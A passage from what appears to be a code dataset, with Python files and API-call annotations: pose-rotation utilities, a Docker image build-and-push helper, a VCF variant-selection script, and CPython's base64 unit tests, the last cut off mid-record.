rot_vec, jac = cv2.Rodrigues(pose_body_mats[i,j])
pose_body[i, 3*j : 3*j+3] = rot_vec.reshape(-1)
result[k] = pose_body
result['global_rvecs'] = loaded[:, -3:]
result['global_tvecs'] = loaded[:, -6:-3]
result['n'] = len(loaded)
else:
result[k] = loaded
return result
def batch_rodrigues(rot_vecs, epsilon=1e-8, dtype=torch.float32):
''' Calculates the rotation matrices for a batch of rotation vectors
Parameters
----------
rot_vecs: torch.tensor Nx3
array of N axis-angle vectors
Returns
-------
R: torch.tensor Nx3x3
The rotation matrices for the given axis-angle parameters
'''
batch_size = rot_vecs.shape[0]
device = rot_vecs.device
angle = torch.norm(rot_vecs + 1e-8, dim=1, keepdim=True)
rot_dir = rot_vecs / angle
cos = torch.unsqueeze(torch.cos(angle), dim=1)
sin = torch.unsqueeze(torch.sin(angle), dim=1)
# Bx1 arrays
rx, ry, rz = torch.split(rot_dir, 1, dim=1)
K = torch.zeros((batch_size, 3, 3), dtype=dtype, device=device)
zeros = torch.zeros((batch_size, 1), dtype=dtype, device=device)
K = torch.cat([zeros, -rz, ry, rz, zeros, -rx, -ry, rx, zeros], dim=1) \
.view((batch_size, 3, 3))
ident = torch.eye(3, dtype=dtype, device=device).unsqueeze(dim=0)
rot_mat = ident + sin * K + (1 - cos) * torch.bmm(K, K)
return rot_mat
def get_selected_ids(id_sel_set, req_ids):
ss_sort = np.argsort(id_sel_set)
req_sort = np.argsort(req_ids)
id_ss_srt = id_sel_set[ss_sort]
id_ss_pos = np.arange(0, len(id_sel_set))[ss_sort]
req_srt = req_ids[req_sort]
req_srt_pos = -1 * np.ones(len(req_srt), dtype=int)
i = 0
j = 0
while i < len(id_ss_srt) and j < len(req_srt):
if req_srt[j] == id_ss_srt[i]:
req_srt_pos[j] = id_ss_pos[i]
i += 1
j += 1
elif req_srt[j] < id_ss_srt[i]:
j += 1
elif id_ss_srt[i] < req_srt[j]:
i += 1
req_ids_ans = -1 * np.ones(len(req_srt), dtype=int)
req_ids_ans[req_sort] = req_srt_pos
return req_ids_ans
| [((16, 12, 16, 45), 'numpy.load', 'np.load', ({(16, 20, 16, 44): "part_path + '/betas.npy'"}, {}), "(part_path + '/betas.npy')", True, 'import numpy as np\n'), ((17, 14, 17, 49), 'numpy.load', 'np.load', ({(17, 22, 17, 48): "part_path + '/fid_lst.npy'"}, {}), "(part_path + '/fid_lst.npy')", True, 'import numpy as np\n'), ((149, 12, 149, 60), 'torch.norm', 'torch.norm', (), '', False, 'import torch\n'), ((156, 17, 156, 47), 'torch.split', 'torch.split', (), '', False, 'import torch\n'), ((157, 8, 157, 67), 'torch.zeros', 'torch.zeros', (), '', False, 'import torch\n'), ((159, 12, 159, 68), 'torch.zeros', 'torch.zeros', (), '', False, 'import torch\n'), ((169, 14, 169, 36), 'numpy.argsort', 'np.argsort', ({(169, 25, 169, 35): 'id_sel_set'}, {}), '(id_sel_set)', True, 'import numpy as np\n'), ((170, 15, 170, 34), 'numpy.argsort', 'np.argsort', ({(170, 26, 170, 33): 'req_ids'}, {}), '(req_ids)', True, 'import numpy as np\n'), ((14, 12, 14, 45), 'numpy.load', 'np.load', ({(14, 20, 14, 44): "(part_path + '/poses.npy')"}, {}), "(part_path + '/poses.npy')", True, 'import numpy as np\n'), ((19, 17, 19, 29), 'json.load', 'json.load', ({(19, 27, 19, 28): 'f'}, {}), '(f)', False, 'import json\n'), ((43, 21, 43, 59), 'numpy.load', 'np.load', ({(43, 29, 43, 58): "part_path + '/dev_orient.npy'"}, {}), "(part_path + '/dev_orient.npy')", True, 'import numpy as np\n'), ((44, 20, 44, 57), 'numpy.load', 'np.load', ({(44, 28, 44, 56): "part_path + '/dev_trans.npy'"}, {}), "(part_path + '/dev_trans.npy')", True, 'import numpy as np\n'), ((50, 23, 50, 51), 'torch.tensor', 'torch.tensor', ({(50, 36, 50, 50): 'poses[:, 0:32]'}, {}), '(poses[:, 0:32])', False, 'import torch\n'), ((60, 20, 60, 44), 'numpy.array', 'np.array', ({(60, 29, 60, 43): 'pose_body_list'}, {}), '(pose_body_list)', True, 'import numpy as np\n'), ((152, 26, 152, 42), 'torch.cos', 'torch.cos', ({(152, 36, 152, 41): 'angle'}, {}), '(angle)', False, 'import torch\n'), ((153, 26, 153, 42), 'torch.sin', 'torch.sin', ({(153, 36, 153, 41): 'angle'}, {}), '(angle)', False, 'import torch\n'), ((15, 23, 15, 62), 'numpy.load', 'np.load', ({(15, 31, 15, 61): "(part_path + '/expressions.npy')"}, {}), "(part_path + '/expressions.npy')", True, 'import numpy as np\n'), ((55, 24, 55, 36), 'numpy.zeros', 'np.zeros', ({(55, 33, 55, 35): '63'}, {}), '(63)', True, 'import numpy as np\n'), ((103, 22, 103, 54), 'os.path.join', 'osp.join', ({(103, 31, 103, 33): 'dp', (103, 35, 103, 53): 'f"""{fn_no_ext}.npy"""'}, {}), "(dp, f'{fn_no_ext}.npy')", True, 'import os.path as osp\n'), ((160, 8, 160, 74), 'torch.cat', 'torch.cat', (), '', False, 'import torch\n'), ((163, 12, 163, 52), 'torch.eye', 'torch.eye', (), '', False, 'import torch\n'), ((164, 44, 164, 59), 'torch.bmm', 'torch.bmm', ({(164, 54, 164, 55): 'K', (164, 57, 164, 58): 'K'}, {}), '(K, K)', False, 'import torch\n'), ((57, 31, 57, 63), 'cv2.Rodrigues', 'cv2.Rodrigues', ({(57, 45, 57, 62): 'pose_body_mats[i]'}, {}), '(pose_body_mats[i])', False, 'import cv2\n'), ((105, 25, 105, 41), 'numpy.load', 'np.load', ({(105, 33, 105, 40): 'load_fp'}, {}), '(load_fp)', True, 'import numpy as np\n'), ((115, 32, 115, 77), 'human_body_prior.tools.model_loader.load_vposer', 'load_vposer', (), '', False, 'from human_body_prior.tools.model_loader import load_vposer\n'), ((117, 35, 117, 64), 'torch.tensor', 'torch.tensor', ({(117, 48, 117, 63): 'loaded[:, 0:32]'}, {}), '(loaded[:, 0:32])', False, 'import torch\n'), ((120, 32, 120, 71), 'numpy.zeros', 'np.zeros', ({(120, 41, 120, 70): '(pose_body_mats.shape[0], 63)'}, {}), '((pose_body_mats.shape[0], 63))', True, 'import numpy as np\n'), ((75, 21, 75, 43), 'cv2.Rodrigues', 'cv2.Rodrigues', ({(75, 35, 75, 42): 'rot_mat'}, {}), '(rot_mat)', False, 'import cv2\n'), ((123, 43, 123, 77), 'cv2.Rodrigues', 'cv2.Rodrigues', ({(123, 57, 123, 76): 'pose_body_mats[i, j]'}, {}), '(pose_body_mats[i, j])', False, 'import cv2\n')] |
axelbarjon/mongodb-kubernetes-operator | scripts/dev/dockerutil.py | 13eb844c55774ce8a6de51edde1a66b4371f3ef6 | import docker
from dockerfile_generator import render
import os
import json
from tqdm import tqdm
from typing import Union, Any, Optional
def build_image(repo_url: str, tag: str, path: str) -> None:
"""
build_image builds the image with the given tag
"""
client = docker.from_env()
print(f"Building image: {tag}")
client.images.build(tag=tag, path=path)
print("Successfully built image!")
def push_image(tag: str) -> None:
"""
push_image pushes the given tag. It uses
the current docker environment
"""
client = docker.from_env()
print(f"Pushing image: {tag}")
with tqdm(total=100, ascii=False) as progress_bar:
last_percent = 0.0
for line in client.images.push(tag, stream=True):
percent = get_completion_percentage(line)
if percent:
progress_bar.update(percent - last_percent)
last_percent = percent
def retag_image(
old_repo_url: str,
new_repo_url: str,
old_tag: str,
new_tag: str,
path: str,
labels: Optional[dict] = None,
username: Optional[str] = None,
password: Optional[str] = None,
registry: Optional[str] = None,
) -> None:
with open(f"{path}/Dockerfile", "w") as f:
f.write(f"FROM {old_repo_url}:{old_tag}")
client = docker.from_env()
if all(value is not None for value in [username, password, registry]):
client.login(username=username, password=password, registry=registry)
image, _ = client.images.build(path=f"{path}", labels=labels, tag=new_tag)
image.tag(new_repo_url, new_tag)
os.remove(f"{path}/Dockerfile")
# We do not want to republish an image that has not changed, so we check if the new
# pair repo:tag already exists.
try:
image = client.images.pull(new_repo_url, new_tag)
return
# We also need to catch APIError as if the image has been recently deleted (uncommon, but might happen?)
# we will get this kind of error:
# docker.errors.APIError: 500 Server Error: Internal Server Error
# ("unknown: Tag <tag> was deleted or has expired. To pull, revive via time machine"
except (docker.errors.ImageNotFound, docker.errors.APIError) as e:
pass
print(f"Pushing to {new_repo_url}:{new_tag}")
client.images.push(new_repo_url, new_tag)
def get_completion_percentage(line: Any) -> float:
try:
line = json.loads(line.strip().decode("utf-8"))
except ValueError:
return 0
to_skip = ("Preparing", "Waiting", "Layer already exists")
if "status" in line:
if line["status"] in to_skip:
return 0
if line["status"] == "Pushing":
try:
current = float(line["progressDetail"]["current"])
total = float(line["progressDetail"]["total"])
except KeyError:
return 0
result = (current / total) * 100
if result > 100.0:
return 100.0
return result
return 0
def build_and_push_image(repo_url: str, tag: str, path: str, image_type: str) -> None:
"""
build_and_push_operator creates the Dockerfile for the operator
and pushes it to the target repo
"""
dockerfile_text = render(image_type, ["."])
with open(f"{path}/Dockerfile", "w") as f:
f.write(dockerfile_text)
build_image(repo_url, tag, path)
os.remove(f"{path}/Dockerfile")
push_image(tag)
| [((14, 13, 14, 30), 'docker.from_env', 'docker.from_env', ({}, {}), '()', False, 'import docker\n'), ((25, 13, 25, 30), 'docker.from_env', 'docker.from_env', ({}, {}), '()', False, 'import docker\n'), ((49, 13, 49, 30), 'docker.from_env', 'docker.from_env', ({}, {}), '()', False, 'import docker\n'), ((55, 4, 55, 35), 'os.remove', 'os.remove', ({(55, 14, 55, 34): 'f"""{path}/Dockerfile"""'}, {}), "(f'{path}/Dockerfile')", False, 'import os\n'), ((100, 22, 100, 47), 'dockerfile_generator.render', 'render', ({(100, 29, 100, 39): 'image_type', (100, 41, 100, 46): "['.']"}, {}), "(image_type, ['.'])", False, 'from dockerfile_generator import render\n'), ((105, 4, 105, 35), 'os.remove', 'os.remove', ({(105, 14, 105, 34): 'f"""{path}/Dockerfile"""'}, {}), "(f'{path}/Dockerfile')", False, 'import os\n'), ((27, 9, 27, 37), 'tqdm.tqdm', 'tqdm', (), '', False, 'from tqdm import tqdm\n')] |
elowy01/igsr_analysis | scripts/VCF/UTILS/select_variants.py | ffea4885227c2299f886a4f41e70b6e1f6bb43da | from VcfFilter import VcfFilter
import argparse
import os
#get command line arguments
parser = argparse.ArgumentParser(description='Script to select a certain variant type from a VCF file')
#parameters
parser.add_argument('--bcftools_folder', type=str, required=True, help='Folder containing the Bcftools binary' )
parser.add_argument('--filename', type=str, required=True, help='Name (without the fullpath) of the VCF file that will be analysed. It assumes that the filename format is for example lc_bams.gatk.xxxx.vcf.gz, where lc_bams is the analysis group and gatk is the method used' )
parser.add_argument('--type', type=str, required=False, help='Type of variant to select. i.e. snps/indels etc' )
args = parser.parse_args()
if __name__ == '__main__':
vcf_f=VcfFilter(vcf=args.filename,bcftools_folder=args.bcftools_folder)
vcf_f.filter_by_variant_type(type=args.type)
| [((8, 9, 8, 103), 'argparse.ArgumentParser', 'argparse.ArgumentParser', (), '', False, 'import argparse\n'), ((19, 10, 19, 75), 'VcfFilter.VcfFilter', 'VcfFilter', (), '', False, 'from VcfFilter import VcfFilter\n')] |
martinphellwig/brython_wf | site/tests/unittests/test/test_base64.py | e169afc1e048cba0c12118b4cd6f109df6fe67c9 | import unittest
from test import support
import base64
import binascii
import os
import sys
import subprocess
class LegacyBase64TestCase(unittest.TestCase):
def test_encodebytes(self):
eq = self.assertEqual
eq(base64.encodebytes(b"www.python.org"), b"d3d3LnB5dGhvbi5vcmc=\n")
eq(base64.encodebytes(b"a"), b"YQ==\n")
eq(base64.encodebytes(b"ab"), b"YWI=\n")
eq(base64.encodebytes(b"abc"), b"YWJj\n")
eq(base64.encodebytes(b""), b"")
eq(base64.encodebytes(b"abcdefghijklmnopqrstuvwxyz"
b"ABCDEFGHIJKLMNOPQRSTUVWXYZ"
b"0123456789!@#0^&*();:<>,. []{}"),
b"YWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXpBQkNE"
b"RUZHSElKS0xNTk9QUVJTVFVWV1hZWjAxMjM0\nNT"
b"Y3ODkhQCMwXiYqKCk7Ojw+LC4gW117fQ==\n")
# Non-bytes
eq(base64.encodebytes(bytearray(b'abc')), b'YWJj\n')
self.assertRaises(TypeError, base64.encodebytes, "")
def test_decodebytes(self):
eq = self.assertEqual
eq(base64.decodebytes(b"d3d3LnB5dGhvbi5vcmc=\n"), b"www.python.org")
eq(base64.decodebytes(b"YQ==\n"), b"a")
eq(base64.decodebytes(b"YWI=\n"), b"ab")
eq(base64.decodebytes(b"YWJj\n"), b"abc")
eq(base64.decodebytes(b"YWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXpBQkNE"
b"RUZHSElKS0xNTk9QUVJTVFVWV1hZWjAxMjM0\nNT"
b"Y3ODkhQCMwXiYqKCk7Ojw+LC4gW117fQ==\n"),
b"abcdefghijklmnopqrstuvwxyz"
b"ABCDEFGHIJKLMNOPQRSTUVWXYZ"
b"0123456789!@#0^&*();:<>,. []{}")
eq(base64.decodebytes(b''), b'')
# Non-bytes
eq(base64.decodebytes(bytearray(b'YWJj\n')), b'abc')
self.assertRaises(TypeError, base64.decodebytes, "")
def test_encode(self):
eq = self.assertEqual
from io import BytesIO, StringIO
infp = BytesIO(b'abcdefghijklmnopqrstuvwxyz'
b'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
b'0123456789!@#0^&*();:<>,. []{}')
outfp = BytesIO()
base64.encode(infp, outfp)
eq(outfp.getvalue(),
b'YWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXpBQkNE'
b'RUZHSElKS0xNTk9QUVJTVFVWV1hZWjAxMjM0\nNT'
b'Y3ODkhQCMwXiYqKCk7Ojw+LC4gW117fQ==\n')
# Non-binary files
self.assertRaises(TypeError, base64.encode, StringIO('abc'), BytesIO())
self.assertRaises(TypeError, base64.encode, BytesIO(b'abc'), StringIO())
self.assertRaises(TypeError, base64.encode, StringIO('abc'), StringIO())
def test_decode(self):
from io import BytesIO, StringIO
infp = BytesIO(b'd3d3LnB5dGhvbi5vcmc=')
outfp = BytesIO()
base64.decode(infp, outfp)
self.assertEqual(outfp.getvalue(), b'www.python.org')
# Non-binary files
self.assertRaises(TypeError, base64.encode, StringIO('YWJj\n'), BytesIO())
self.assertRaises(TypeError, base64.encode, BytesIO(b'YWJj\n'), StringIO())
self.assertRaises(TypeError, base64.encode, StringIO('YWJj\n'), StringIO())
class BaseXYTestCase(unittest.TestCase):
def test_b64encode(self):
eq = self.assertEqual
# Test default alphabet
eq(base64.b64encode(b"www.python.org"), b"d3d3LnB5dGhvbi5vcmc=")
eq(base64.b64encode(b'\x00'), b'AA==')
eq(base64.b64encode(b"a"), b"YQ==")
eq(base64.b64encode(b"ab"), b"YWI=")
eq(base64.b64encode(b"abc"), b"YWJj")
eq(base64.b64encode(b""), b"")
eq(base64.b64encode(b"abcdefghijklmnopqrstuvwxyz"
b"ABCDEFGHIJKLMNOPQRSTUVWXYZ"
b"0123456789!@#0^&*();:<>,. []{}"),
b"YWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXpBQkNE"
b"RUZHSElKS0xNTk9QUVJTVFVWV1hZWjAxMjM0NT"
b"Y3ODkhQCMwXiYqKCk7Ojw+LC4gW117fQ==")
# Test with arbitrary alternative characters
eq(base64.b64encode(b'\xd3V\xbeo\xf7\x1d', altchars=b'*$'), b'01a*b$cd')
# Non-bytes
eq(base64.b64encode(bytearray(b'abcd')), b'YWJjZA==')
eq(base64.b64encode(b'\xd3V\xbeo\xf7\x1d', altchars=bytearray(b'*$')),
b'01a*b$cd')
# Check if passing a str object raises an error
self.assertRaises(TypeError, base64.b64encode, "")
self.assertRaises(TypeError, base64.b64encode, b"", altchars="")
# Test standard alphabet
eq(base64.standard_b64encode(b"www.python.org"), b"d3d3LnB5dGhvbi5vcmc=")
eq(base64.standard_b64encode(b"a"), b"YQ==")
eq(base64.standard_b64encode(b"ab"), b"YWI=")
eq(base64.standard_b64encode(b"abc"), b"YWJj")
eq(base64.standard_b64encode(b""), b"")
eq(base64.standard_b64encode(b"abcdefghijklmnopqrstuvwxyz"
b"ABCDEFGHIJKLMNOPQRSTUVWXYZ"
b"0123456789!@#0^&*();:<>,. []{}"),
b"YWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXpBQkNE"
b"RUZHSElKS0xNTk9QUVJTVFVWV1hZWjAxMjM0NT"
b"Y3ODkhQCMwXiYqKCk7Ojw+LC4gW117fQ==")
# Non-bytes
eq(base64.standard_b64encode(bytearray(b'abcd')), b'YWJjZA==')
# Check if passing a str object raises an error
self.assertRaises(TypeError, base64.standard_b64encode, "")
# Test with 'URL safe' alternative characters
eq(base64.urlsafe_b64encode(b'\xd3V\xbeo\xf7\x1d'), b'01a-b_cd')
# Non-bytes
eq(base64.urlsafe_b64encode(bytearray(b'\xd3V\xbeo\xf7\x1d')), b'01a-b_cd')
# Check if passing a str object raises an error
self.assertRaises(TypeError, base64.urlsafe_b64encode, "")
def test_b64decode(self):
eq = self.assertEqual
tests = {b"d3d3LnB5dGhvbi5vcmc=": b"www.python.org",
b'AA==': b'\x00',
b"YQ==": b"a",
b"YWI=": b"ab",
b"YWJj": b"abc",
b"YWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXpBQkNE"
b"RUZHSElKS0xNTk9QUVJTVFVWV1hZWjAxMjM0\nNT"
b"Y3ODkhQCMwXiYqKCk7Ojw+LC4gW117fQ==":
b"abcdefghijklmnopqrstuvwxyz"
b"ABCDEFGHIJKLMNOPQRSTUVWXYZ"
b"0123456789!@#0^&*();:<>,. []{}",
b'': b'',
}
for data, res in tests.items():
eq(base64.b64decode(data), res)
eq(base64.b64decode(data.decode('ascii')), res)
# Non-bytes
eq(base64.b64decode(bytearray(b"YWJj")), b"abc")
# Test with arbitrary alternative characters
tests_altchars = {(b'01a*b$cd', b'*$'): b'\xd3V\xbeo\xf7\x1d',
}
for (data, altchars), res in tests_altchars.items():
data_str = data.decode('ascii')
altchars_str = altchars.decode('ascii')
eq(base64.b64decode(data, altchars=altchars), res)
eq(base64.b64decode(data_str, altchars=altchars), res)
eq(base64.b64decode(data, altchars=altchars_str), res)
eq(base64.b64decode(data_str, altchars=altchars_str), res)
# Test standard alphabet
for data, res in tests.items():
eq(base64.standard_b64decode(data), res)
eq(base64.standard_b64decode(data.decode('ascii')), res)
# Non-bytes
eq(base64.standard_b64decode(bytearray(b"YWJj")), b"abc")
# Test with 'URL safe' alternative characters
tests_urlsafe = {b'01a-b_cd': b'\xd3V\xbeo\xf7\x1d',
b'': b'',
}
for data, res in tests_urlsafe.items():
eq(base64.urlsafe_b64decode(data), res)
eq(base64.urlsafe_b64decode(data.decode('ascii')), res)
# Non-bytes
eq(base64.urlsafe_b64decode(bytearray(b'01a-b_cd')), b'\xd3V\xbeo\xf7\x1d')
def test_b64decode_padding_error(self):
self.assertRaises(binascii.Error, base64.b64decode, b'abc')
self.assertRaises(binascii.Error, base64.b64decode, 'abc')
def test_b64decode_invalid_chars(self):
# issue 1466065: Test some invalid characters.
tests = ((b'%3d==', b'\xdd'),
(b'$3d==', b'\xdd'),
(b'[==', b''),
(b'YW]3=', b'am'),
(b'3{d==', b'\xdd'),
(b'3d}==', b'\xdd'),
(b'@@', b''),
(b'!', b''),
(b'YWJj\nYWI=', b'abcab'))
for bstr, res in tests:
self.assertEqual(base64.b64decode(bstr), res)
self.assertEqual(base64.b64decode(bstr.decode('ascii')), res)
with self.assertRaises(binascii.Error):
base64.b64decode(bstr, validate=True)
with self.assertRaises(binascii.Error):
base64.b64decode(bstr.decode('ascii'), validate=True)
def test_b32encode(self):
eq = self.assertEqual
eq(base64.b32encode(b''), b'')
eq(base64.b32encode(b'\x00'), b'AA======')
eq(base64.b32encode(b'a'), b'ME======')
eq(base64.b32encode(b'ab'), b'MFRA====')
eq(base64.b32encode(b'abc'), b'MFRGG===')
eq(base64.b32encode(b'abcd'), b'MFRGGZA=')
eq(base64.b32encode(b'abcde'), b'MFRGGZDF')
# Non-bytes
eq(base64.b32encode(bytearray(b'abcd')), b'MFRGGZA=')
self.assertRaises(TypeError, base64.b32encode, "")
def test_b32decode(self):
eq = self.assertEqual
tests = {b'': b'',
b'AA======': b'\x00',
b'ME======': b'a',
b'MFRA====': b'ab',
b'MFRGG===': b'abc',
b'MFRGGZA=': b'abcd',
b'MFRGGZDF': b'abcde',
}
for data, res in tests.items():
eq(base64.b32decode(data), res)
eq(base64.b32decode(data.decode('ascii')), res)
# Non-bytes
eq(base64.b32decode(bytearray(b'MFRGG===')), b'abc')
def test_b32decode_casefold(self):
eq = self.assertEqual
tests = {b'': b'',
b'ME======': b'a',
b'MFRA====': b'ab',
b'MFRGG===': b'abc',
b'MFRGGZA=': b'abcd',
b'MFRGGZDF': b'abcde',
# Lower cases
b'me======': b'a',
b'mfra====': b'ab',
b'mfrgg===': b'abc',
b'mfrggza=': b'abcd',
b'mfrggzdf': b'abcde',
}
for data, res in tests.items():
eq(base64.b32decode(data, True), res)
eq(base64.b32decode(data.decode('ascii'), True), res)
self.assertRaises(binascii.Error, base64.b32decode, b'me======')
self.assertRaises(binascii.Error, base64.b32decode, 'me======')
# Mapping zero and one
eq(base64.b32decode(b'MLO23456'), b'b\xdd\xad\xf3\xbe')
eq(base64.b32decode('MLO23456'), b'b\xdd\xad\xf3\xbe')
map_tests = {(b'M1023456', b'L'): b'b\xdd\xad\xf3\xbe',
(b'M1023456', b'I'): b'b\x1d\xad\xf3\xbe',
}
for (data, map01), res in map_tests.items():
data_str = data.decode('ascii')
map01_str = map01.decode('ascii')
eq(base64.b32decode(data, map01=map01), res)
eq(base64.b32decode(data_str, map01=map01), res)
eq(base64.b32decode(data, map01=map01_str), res)
eq(base64.b32decode(data_str, map01=map01_str), res)
self.assertRaises(binascii.Error, base64.b32decode, data)
self.assertRaises(binascii.Error, base64.b32decode, data_str)
def test_b32decode_error(self):
for data in [b'abc', b'ABCDEF==', b'==ABCDEF']:
with self.assertRaises(binascii.Error):
base64.b32decode(data)
with self.assertRaises(binascii.Error):
base64.b32decode(data.decode('ascii'))
def test_b16encode(self):
eq = self.assertEqual
eq(base64.b16encode(b'\x01\x02\xab\xcd\xef'), b'0102ABCDEF')
eq(base64.b16encode(b'\x00'), b'00')
# Non-bytes
eq(base64.b16encode(bytearray(b'\x01\x02\xab\xcd\xef')), b'0102ABCDEF')
self.assertRaises(TypeError, base64.b16encode, "")
def test_b16decode(self):
eq = self.assertEqual
eq(base64.b16decode(b'0102ABCDEF'), b'\x01\x02\xab\xcd\xef')
eq(base64.b16decode('0102ABCDEF'), b'\x01\x02\xab\xcd\xef')
eq(base64.b16decode(b'00'), b'\x00')
eq(base64.b16decode('00'), b'\x00')
# Lower case is not allowed without a flag
self.assertRaises(binascii.Error, base64.b16decode, b'0102abcdef')
self.assertRaises(binascii.Error, base64.b16decode, '0102abcdef')
# Case fold
eq(base64.b16decode(b'0102abcdef', True), b'\x01\x02\xab\xcd\xef')
eq(base64.b16decode('0102abcdef', True), b'\x01\x02\xab\xcd\xef')
# Non-bytes
eq(base64.b16decode(bytearray(b"0102ABCDEF")), b'\x01\x02\xab\xcd\xef')
def test_decode_nonascii_str(self):
decode_funcs = (base64.b64decode,
base64.standard_b64decode,
base64.urlsafe_b64decode,
base64.b32decode,
base64.b16decode)
for f in decode_funcs:
self.assertRaises(ValueError, f, 'with non-ascii \xcb')
def test_ErrorHeritage(self):
self.assertTrue(issubclass(binascii.Error, ValueError))
class TestMain(unittest.TestCase):
def tearDown(self):
if os.path.exists(support.TESTFN):
os.unlink(support.TESTFN)
def get_output(self, *args, **options):
args = (sys.executable, '-m', 'base64') + args
return subprocess.check_output(args, **options)
def test_encode_decode(self):
output = self.get_output('-t')
self.assertSequenceEqual(output.splitlines(), (
b"b'Aladdin:open sesame'",
br"b'QWxhZGRpbjpvcGVuIHNlc2FtZQ==\n'",
b"b'Aladdin:open sesame'",
))
def test_encode_file(self):
with open(support.TESTFN, 'wb') as fp:
fp.write(b'a\xffb\n')
output = self.get_output('-e', support.TESTFN)
self.assertEqual(output.rstrip(), b'Yf9iCg==')
with open(support.TESTFN, 'rb') as fp:
output = self.get_output('-e', stdin=fp)
self.assertEqual(output.rstrip(), b'Yf9iCg==')
def test_decode(self):
with open(support.TESTFN, 'wb') as fp:
fp.write(b'Yf9iCg==')
output = self.get_output('-d', support.TESTFN)
self.assertEqual(output.rstrip(), b'a\xffb')
def test_main():
support.run_unittest(__name__)
if __name__ == '__main__':
test_main()
| [((349, 4, 349, 34), 'test.support.run_unittest', 'support.run_unittest', ({(349, 25, 349, 33): '__name__'}, {}), '(__name__)', False, 'from test import support\n'), ((49, 15, 51, 57), 'io.BytesIO', 'BytesIO', ({(49, 23, 51, 56): "b'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#0^&*();:<>,. []{}'"}, {}), "(\n b'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#0^&*();:<>,. []{}'\n )", False, 'from io import BytesIO, StringIO\n'), ((52, 16, 52, 25), 'io.BytesIO', 'BytesIO', ({}, {}), '()', False, 'from io import BytesIO, StringIO\n'), ((53, 8, 53, 34), 'base64.encode', 'base64.encode', ({(53, 22, 53, 26): 'infp', (53, 28, 53, 33): 'outfp'}, {}), '(infp, outfp)', False, 'import base64\n'), ((65, 15, 65, 47), 'io.BytesIO', 'BytesIO', ({(65, 23, 65, 46): "b'd3d3LnB5dGhvbi5vcmc='"}, {}), "(b'd3d3LnB5dGhvbi5vcmc=')", False, 'from io import BytesIO, StringIO\n'), ((66, 16, 66, 25), 'io.BytesIO', 'BytesIO', ({}, {}), '()', False, 'from io import BytesIO, StringIO\n'), ((67, 8, 67, 34), 'base64.decode', 'base64.decode', ({(67, 22, 67, 26): 'infp', (67, 28, 67, 33): 'outfp'}, {}), '(infp, outfp)', False, 'import base64\n'), ((314, 11, 314, 41), 'os.path.exists', 'os.path.exists', ({(314, 26, 314, 40): 'support.TESTFN'}, {}), '(support.TESTFN)', False, 'import os\n'), ((319, 15, 319, 55), 'subprocess.check_output', 'subprocess.check_output', ({(319, 39, 319, 43): 'args'}, {}), '(args, **options)', False, 'import subprocess\n'), ((14, 11, 14, 48), 'base64.encodebytes', 'base64.encodebytes', ({(14, 30, 14, 47): "b'www.python.org'"}, {}), "(b'www.python.org')", False, 'import base64\n'), ((15, 11, 15, 35), 'base64.encodebytes', 'base64.encodebytes', ({(15, 30, 15, 34): "b'a'"}, {}), "(b'a')", False, 'import base64\n'), ((16, 11, 16, 36), 'base64.encodebytes', 'base64.encodebytes', ({(16, 30, 16, 35): "b'ab'"}, {}), "(b'ab')", False, 'import base64\n'), ((17, 11, 17, 37), 'base64.encodebytes', 'base64.encodebytes', ({(17, 30, 17, 36): "b'abc'"}, {}), "(b'abc')", False, 'import base64\n'), ((18, 11, 18, 34), 'base64.encodebytes', 'base64.encodebytes', ({(18, 30, 18, 33): "b''"}, {}), "(b'')", False, 'import base64\n'), ((19, 11, 21, 65), 'base64.encodebytes', 'base64.encodebytes', ({(19, 30, 21, 64): "b'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#0^&*();:<>,. []{}'"}, {}), "(\n b'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#0^&*();:<>,. []{}'\n )", False, 'import base64\n'), ((31, 11, 31, 56), 'base64.decodebytes', 'base64.decodebytes', ({(31, 30, 31, 55): "b'd3d3LnB5dGhvbi5vcmc=\\n'"}, {}), "(b'd3d3LnB5dGhvbi5vcmc=\\n')", False, 'import base64\n'), ((32, 11, 32, 40), 'base64.decodebytes', 'base64.decodebytes', ({(32, 30, 32, 39): "b'YQ==\\n'"}, {}), "(b'YQ==\\n')", False, 'import base64\n'), ((33, 11, 33, 40), 'base64.decodebytes', 'base64.decodebytes', ({(33, 30, 33, 39): "b'YWI=\\n'"}, {}), "(b'YWI=\\n')", False, 'import base64\n'), ((34, 11, 34, 40), 'base64.decodebytes', 'base64.decodebytes', ({(34, 30, 34, 39): "b'YWJj\\n'"}, {}), "(b'YWJj\\n')", False, 'import base64\n'), ((35, 11, 37, 71), 'base64.decodebytes', 'base64.decodebytes', ({(35, 30, 37, 70): "b'YWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXpBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWjAxMjM0\\nNTY3ODkhQCMwXiYqKCk7Ojw+LC4gW117fQ==\\n'"}, {}), "(\n b'YWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXpBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWjAxMjM0\\nNTY3ODkhQCMwXiYqKCk7Ojw+LC4gW117fQ==\\n'\n )", False, 'import base64\n'), ((41, 11, 41, 34), 'base64.decodebytes', 'base64.decodebytes', ({(41, 30, 41, 33): "b''"}, {}), "(b'')", False, 'import base64\n'), ((59, 52, 59, 67), 'io.StringIO', 'StringIO', ({(59, 61, 59, 66): '"""abc"""'}, {}), "('abc')", False, 'from io import BytesIO, StringIO\n'), ((59, 69, 59, 78), 'io.BytesIO', 'BytesIO', ({}, {}), '()', False, 'from io import BytesIO, StringIO\n'), ((60, 52, 60, 67), 'io.BytesIO', 'BytesIO', ({(60, 60, 60, 66): "b'abc'"}, {}), "(b'abc')", False, 'from io import BytesIO, StringIO\n'), ((60, 69, 60, 79), 'io.StringIO', 'StringIO', ({}, {}), '()', False, 'from io import BytesIO, StringIO\n'), ((61, 52, 61, 67), 'io.StringIO', 'StringIO', ({(61, 61, 61, 66): '"""abc"""'}, {}), "('abc')", False, 